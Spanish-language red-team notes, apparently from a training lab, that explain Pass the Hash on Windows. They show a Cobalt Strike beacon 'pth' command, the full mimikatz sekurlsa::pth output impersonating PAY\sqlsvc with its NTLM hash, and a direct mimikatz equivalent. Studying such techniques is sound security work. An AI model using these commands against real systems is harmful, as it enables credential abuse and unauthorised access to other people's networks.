Pass the Hash (PtH)
Es un ataque que permite autenticarnos a sistemas windows usando el NTLM hash del password de un usuario en vez del password en texto plano.
pth PAY\sqlsvc 32918fbec63cc3c7c83a8c3c9787842cEsto pasa el token sobre un named pipe al beacon y lo impersona automaticamente.
[02/27 06:14:07] [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:"sqlsvc" /domain:"PAY" /ntlm:32918fbec63cc3c7c83a8c3c9787842c /run:"%COMSPEC% /c echo 16ed02714a8 > \\.\pipe\30cbe3" command
[02/27 06:14:09] [+] host called home, sent: 313695 bytes
[02/27 06:14:10] [+] Impersonated PAY\sqlsvc
[02/27 06:14:10] [+] received output:
user : sqlsvc
domain : PAY
program : C:\Windows\system32\cmd.exe /c echo 16ed02714a8 > \\.\pipe\30cbe3
impers. : no
NTLM : 32918fbec63cc3c7c83a8c3c9787842c
| PID 6016
| TID 4620
| LSA Process is now R/W
| LUID 0 ; 6692080 (00000000:00661cf0)
\_ msv1_0 - data copy @ 0000022876045F90 : OK !
\_ kerberos - data copy @ 000002287CEFF168
\_ des_cbc_md4 -> null
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ *Password replace @ 000002287E3DE178 (32) -> nullTambien se puede realizar con mimikatz directamente.
mimikatz sekurlsa::pth /user:"sqlsvc" /domain:"PAY" /ntlm:32918fbec63cc3c7c83a8c3c9787842c